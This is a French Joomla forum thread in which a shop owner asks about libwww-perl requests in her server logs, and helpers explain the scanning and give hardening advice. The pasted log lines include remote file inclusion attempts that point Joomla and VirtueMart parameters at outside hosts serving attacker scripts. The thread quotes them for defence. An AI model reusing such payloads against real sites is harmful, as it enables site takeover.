Script malveillant libwww-perl

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Script malveillant libwww-perl

    Bonjour,

    Je me suis aperçue en regardant mon fichier log que j'ai beaucoup de script libwww-perl. Que font ces scripts ? comment s'en garantir ?

    Je les ai regroupés ici mais ils se retrouvent par dizaine avec des ip différentes :

    GET /fr/site//index.php?option=com_registration&mosConfig.absolu te.path=http://film-store.net/administrator/components/com_fireboard/images/ida.txt?? HTTP/1.1" 403 104

    GET /component/ HTTP/1.1" 301 - "-"

    GET /index.php?option=com_&Itemid= HTTP/1.1" 404 1390 "-"

    GET //index.php?option=com_frontpage&mosConfig.absolute. path=http://www.miahuatlan-oax.com.mx/galeria/logs/myid.jpg? HTTP/1.1" 301 - "-"

    GET /fr/site//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.miahuatlan-oax.com.mx/galeria/logs/myid.jpg? HTTP/1.1" 404 12861 "-"

    GET /fr/site//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.steelcitygray.com/auction/uploaded/golput/ID-RFI.txt?? HTTP/1.1" 403 104 "-"

    GET /robots.txt HTTP/1.1" 200 473 "-" "W3C-checklink/4.6 [4.194]
    GET /en/site/online-french-boutique/vmchk.html HTTP/1.1" 200 6408 "-" "W3C-checklink/4.6 [4.194]

    HEAD /index.php?option=com_virtuemart&Itemid=74&lang=en& limitstart=0&vmcchk=1&Itemid=87 HTTP/1.1" 301 - "http://www.site/" "W3C-checklink/4.6 [4.194]

    HEAD /index.php HTTP/1.1" 301 - "http://www.site/" "W3C-checklink/4.6 [4.194]

    HEAD /en/site/your-french-story/your-story-of-france.html HTTP/1.1" 200 - "http://www.site/" "W3C-checklink/4.6 [4.194]

    HEAD /en/site/create-customer-account.html HTTP/1.1" 303 - "http://www.site" "W3C-checklink/4.6 [4.194]

    HEAD /en/site/lost-password.html HTTP/1.1" 200 - "http://www.site/" "W3C-checklink/4.6 [4.194]

    HEAD /site/en/sitemap-4.html HTTP/1.1" 200 - "http://www.site/" "W3C-checklink/4.6 [4.194]
    et bien d'autres pages Joomla et Virtuemart.

    Je vous remercie de votre aide.
    Joomla v1.5.22
    Template JA Purity II v1.2
    Virtuemart v1.1.4
    Joomlapack v2.4.1-plus_FR
    Joomfish v2.04
    Sh404sef2_2.1.8.777
    Xmap_1.2.9b
    Paiement sécurisé 3D Secure Scellius
    Hébergement OVH Pro

  • #2
    Bonsoir,

    Pas trop d'utilité de poster un nouveau topic identique deux fois en 5 minutes

    Cordialement,
    Joël

    Commentaire


    • #3
      Sévère comme réponse ! En fait mon pc a beugué, mon mail avait disparu (je ne le retrouve toujours pas), j'ai cru qu'il n'était pas enregistré. Désolée.
      Dernière édition par bibibastille à 26/10/2010, 23h33
      Joomla v1.5.22
      Template JA Purity II v1.2
      Virtuemart v1.1.4
      Joomlapack v2.4.1-plus_FR
      Joomfish v2.04
      Sh404sef2_2.1.8.777
      Xmap_1.2.9b
      Paiement sécurisé 3D Secure Scellius
      Hébergement OVH Pro

      Commentaire


      • #4
        Sévère comme réponse ! En fait mon pc a beugué, mon mail avait disparu (je ne le retrouve toujours pas), j'ai cru qu'il n'était pas enregistré. Désolée.
        Pas de problèmes

        Je vais supprimer le topic en trop

        Cordialement,
        Joël
        Dernière édition par jovdev à 26/10/2010, 23h43

        Commentaire


        • #5
          Salut Bibibastille,

          libwww-perl est un robot navigateur qui teste (très rapidement d'ailleurs) les sites à la recherche de failles. Il se base sur un listing de composants joomla ayant une faille de sécurité et tente de prendre le contrôle du site et/ou du serveur. Ce script peut être redoutable lorsque les hackeurs disposent des bonnes macros !!

          Pour t'en préserver, il existe plusieurs solutions mais il nous faut savoir de quel type d'hébergement tu disposes...

          @++
          Hyperion
          Pas de demande de support en MP ou par mail, le forum est là pour ça!
          http://network.wantoo.com : Wantoo Network - Infogérance Serveurs Dédiés - Sécurité Joomla!

          Commentaire


          • #6
            Merci de ta réponse, je suis très inquiète - je suis en mutualisé pro chez OVH.
            Joomla v1.5.22
            Template JA Purity II v1.2
            Virtuemart v1.1.4
            Joomlapack v2.4.1-plus_FR
            Joomfish v2.04
            Sh404sef2_2.1.8.777
            Xmap_1.2.9b
            Paiement sécurisé 3D Secure Scellius
            Hébergement OVH Pro

            Commentaire


            • #7
              Bon, ne soit pas si inquiète. Le fait que tu surveilles tes logs est déjà une excellente chose. Tu peux déjà mettre en place une stratégie de crise (backups, surveillance, restauration...). Il y a eu une vague d'attaques en mars / avril 2010 qui a donné lieu à une belle discussion sur les réglages .htaccess sur ce même forum mais c'est peut être un poil technique (http://forum.joomla.fr/archive/index.php/t-119580.html)...

              Etant abonné aux listes admins de chez OVH, j'ai vu passer des réactions de la part des admins sys OVH. Ils ont blindé un peu plus l'infrastructure mutualisée contre certaines de ces attaques classiques. Mais pas pour tout, malheureusement... Sur les serveurs dédiés, on sécurise avec mod_security ou suhosin dont le boulot est de contrer ces attaques et rediriger les IP des hackeurs dans un joli trou noir via le firewall. Paf, c'est radical. Mais en mutu, c'est plus délicat.

              1ère chose à faire (si ce n'est déjà fait) :
              - mettre à jour ton Joomla
              - mettre à jour toutes tes extensions
              - désinstaller celles qui trainent et ne te servent pas

              2ème étape : vérifier que tes fichiers ont les bons "chmod", les bons droits. De mémoire 705 sur un mutu OVH.

              Ensuite, quelques composants peuvent t'aider à blinder/surveiller un peu ton install :
              - Jmonitoring (qui te permet de suivre tes extensions et savoir si elles sont à jour)
              - sh404SEF (qui a une partie sécurité - ma foi - assez efficace)
              - ou RS Firewall (qui, une fois l'audit de sécurité terminé, permet de verrouiller tous les fichiers du site)
              - voire installer un Crawltrack
              - en dernier lieu essayer les divers .htaccess créés par les membres du forum. Avec précaution car cela peut déstabiliser ton hébergement et/ou te prendre des erreurs 500 à la pelle

              Voilà quelques pistes de travail sachant que la liberté de mouvement au sein d'un espace mutualisé est nécessairement plus restreinte qu'un hébergement dédié-infogéré (pas du tout le même tarif non plus). Je pense sincèrement que toutes ces pistes ont été traitées au sein de ce forum. Tiens nous au courant

              @++
              Hyperion

              Edit : je n'avais pas vu ta signature. Tu as déjà certains éléments listés ci-dessus. C'est un bon point
              Pas de demande de support en MP ou par mail, le forum est là pour ça!
              http://network.wantoo.com : Wantoo Network - Infogérance Serveurs Dédiés - Sécurité Joomla!

              Commentaire


              • #8
                Merci de ces conseils, je vais les suivre.

                La question que je me pose c'est comment savoir ce que ces scripts ont fait ? Mon site reste visible.
                Joomla v1.5.22
                Template JA Purity II v1.2
                Virtuemart v1.1.4
                Joomlapack v2.4.1-plus_FR
                Joomfish v2.04
                Sh404sef2_2.1.8.777
                Xmap_1.2.9b
                Paiement sécurisé 3D Secure Scellius
                Hébergement OVH Pro

                Commentaire


                • #9
                  Ils n'ont rien fait visiblement sinon tu aurais tout de suite vu le résultat en frontal Ces attaques sont monnaie courante.

                  Dans la plupart des cas ces scripts, lorsqu'ils parviennent à trouver une faille, servent à obtenir des droits supérieurs (d'écriture) sur les fichiers de l'hébergement (voire du serveur complet, par escalade, s'il est mal configuré). Ceci fait, le hackeur se glorifie de sa haute technicité en remplaçant quelques fichiers et en mettant une page d'accueil sur mesure... "hacked by ..." par exemple. Ce sont des "script kiddies" qui ne font rien d'autre qu'utiliser des bouts de code trouvés sur Internet.

                  Les autres types d'attaques (les plus habiles) sont, elles, destinées à gagner un "zombie" c'est à dire un client destiné à perpétrer d'autres attaques sur des serveurs plus sensibles... et là, tu ne vois rien venir jusqu'à ce qu'OVH te bloque le domaine (car eux le voient) ! Ces attaques là, beaucoup plus rares, sont le challenge des admins sys !

                  Et si je te dis tout ça, c'est vraiment pour ton information. Surtout pas pour te faire flipper. De toutes façons, une gestion saine d'un site passe par la mise en oeuvre de ce dont on a parlé plus haut et d'une bonne préparation à la reprise d'un sinistre (backups...etc.). Si tu disposes d'une copie distante de ton site, par exemple récupérée quotidiennement en local sur ton ordi alors tu pourras faire face à toute situation critique. Sachant qu'il y a ici de bonnes pointures pour t'aider à reprendre le fil normal de ton hébergement
                  Pas de demande de support en MP ou par mail, le forum est là pour ça!
                  http://network.wantoo.com : Wantoo Network - Infogérance Serveurs Dédiés - Sécurité Joomla!

                  Commentaire


                  • #10
                    Un grand merci pour toutes ces informations.

                    J'aurais juste une dernière question par rapport à ce genre de script : HEAD /en/site/your-french-story/your-story-of-france.html HTTP/1.1" 200 - "http://www.site/" "W3C-checklink/4.6 [4.194], qu'est-ce qu'il fait exactement ?

                    parce que je m'interroge : des pages de mon site sont en code 403 (dont notamment celle-là), visibles par l'internaute mais bloquées aux robots, d'ou un pb d'indexation de page et donc de référencement et je me demande si ce genre de script n'en est pas responsable.

                    En tout cas, merci de ton aide.
                    Joomla v1.5.22
                    Template JA Purity II v1.2
                    Virtuemart v1.1.4
                    Joomlapack v2.4.1-plus_FR
                    Joomfish v2.04
                    Sh404sef2_2.1.8.777
                    Xmap_1.2.9b
                    Paiement sécurisé 3D Secure Scellius
                    Hébergement OVH Pro

                    Commentaire

                    Annonce

                    Réduire
                    1 sur 2 < >

                    C'est [Réglé] et on n'en parle plus ?

                    A quoi ça sert ?
                    La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                    Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                    Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                    Comment ajouter la mention [Réglé] à votre discussion ?
                    1 - Aller sur votre discussion et éditer votre premier message :


                    2 - Cliquer sur la liste déroulante Préfixe.

                    3 - Choisir le préfixe [Réglé].


                    4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                    2 sur 2 < >

                    Assistance au forum - Outil de publication d'infos de votre site

                    Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                    Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                    Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                    UTILISER À VOS PROPRES RISQUES :
                    L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                    Problèmes connus :
                    FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                    Installation :

                    1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                    Archive zip : https://github.com/AFUJ/FPA/zipball/master

                    2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                    3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                    4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                    5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                    6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                    et remplacer www. votresite .com par votre nom de domaine


                    Exemples:
                    Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                    Télécharger le script fpa-fr.php dans: /public_html/
                    Pour executer le script: http://www..com/fpa-fr.php

                    Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                    Télécharger le script fpa-fr.php dans: /public_html/cms/
                    Pour executer le script: http://www..com/cms/fpa-fr.php

                    En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                    Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                    Voir plus
                    Voir moins
                    Travaille ...
                    X